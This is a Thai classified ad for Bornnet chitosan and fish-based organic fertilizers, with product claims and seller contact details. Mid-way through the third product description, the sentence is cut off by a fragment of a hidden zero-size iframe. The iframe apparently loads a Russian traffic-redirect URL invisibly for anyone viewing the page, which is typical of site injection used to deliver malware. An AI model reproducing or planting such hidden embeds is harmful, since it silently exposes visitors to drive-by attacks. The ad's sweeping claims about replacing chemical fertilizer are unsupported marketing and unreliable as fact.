ประกาศซื้อขายฟรี
ผลิต และ จำหน่าย ไคโตซาน หรือสารสกัดจากเปลือกกุ้ง สูตรสำหรับพืชและสัตว์ ประสิทธิภาพสูงสามารถใช้ทดแทนปุ๋ยเคมี

          BORNNET จัดจำหน่าย ไคโตซานสูตรสำหรับ พืชและสัตว์ ใช้ทดแทนปุ๋ยยูเรีย และปุ๋ยเคมีได้ และทำให้ไม่เกิดปัญหาการเสื่อมสภาพของดินนอกจากนี้ยังมีผลิตภัณฑ์ เกี่ยวกับปุ๋ยชีวภาพ ดังนี้

          จำหน่าย ปุ๋ยอินทรีย์ ที่ทำจากปลา มีปริมาณธาตุอาหารที่จำเป็นต่อพืชสูง และไม่มีผลกระทบต่อสิ่งแวดล้อม และสุขภาพของผู้ใช้งาน รวมทั้งจำหน่ายไคโตซานสำหรับพืชและสัตว์

1.      Bornnet Grove  ผลิตภัณฑ์ปุ๋ยที่ทำจากปลา  มีคุณสมบัติ ช่วยในการเจริญเติบโตของพืช โดยจะช่วยเร่งการเจริญเติบโต, เร่งการออกดอก ออกผล เป็นต้น ซึ่งผลิตภัณฑ์ปุ๋ยที่ทำจากปลาจะช่วยลดการใช้ใช้สารเคมีเกษตร เช่น ยาฆ่าแมลง, สารฆ่าเชื้อราและแบคทีเรีย

2.      อะมิโนพลัส (ปุ๋ยทางใบ) ช่วยให้จุลินทรีย์ในดินทำงานอย่างเต็มที่ ช่วยปรับปรุงคุณภาพดินให้มีความอุดมสมดุลย์ และเหมาะสม ต่อการเพาะปลูกและย่อยสลายแร่ธาตุในดินให้พืชนำไปใช้อย่างมีประสิทธิภาพ จึงไม่มีการสูญเสียไปกับการชะล้าง เหมือนปุ๋ยเคมี และไม่ทำให้ดินแน่นเสียมีคุณสมบัติในการระบายน้ำและอากาศ

3.      ไคโตซาน สำหรับพืช เหมาะสำหรับการทำเกษตรพืชไร่, พืชสวน, นาข้าว โดยสามารถกระตุ้นภูมิคุ้มกันตามธรรมชาติของพืชทำให้พืชมีสุขภาพแข็งแรง และยังเสริมสร้าง src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none">

จุดประสงค์
: ต้องการขาย
ราคา/ค่าบริการ
: ไม่ระบุ
ประเภท
: สินค้าใหม่
ผู้ประกาศ
: สุกัญญา Bornnet
โทรศัพท์
: 029341826
มือถือ
: 0858343549
จังหวัด
: กรุงเทพมหานครฯ
อัพเดทล่าสุด
: 24/11/2551 13:18:21

 โปรดอ่านคำเตือน

ข้อความที่ประกาศ และโฆษณาทั้งหมดนี้ เป็นสิ่งที่เกิดขึ้นจากผู้ชมและสมาชิก ที่เข้ามาใช้บริการ ไม่ได้เกิดจากผู้ดูแลหรือผู้จัดทำเว็บไซต์ หากผู้ชมสนใจในประกาศและโฆษณาดังกล่าว กรุณาติดต่อโดยตรงถึงผู้ที่ลงประกาศ หรือโฆษณา ด้วยตนเอง และหากเกิดความผิดพลาดใดๆ เราไม่ขอรับผิดชอบ ดังนั้นผู้ชมควรใช้วิจารณญาณก่อนการติดสินใจใดๆ เกี่ยวกับคำประกาศและโฆษณาดังกล่าวนี้
เว็บไซต์สำเร็จรูป

แสดงความคิดเห็น

Related Classifieds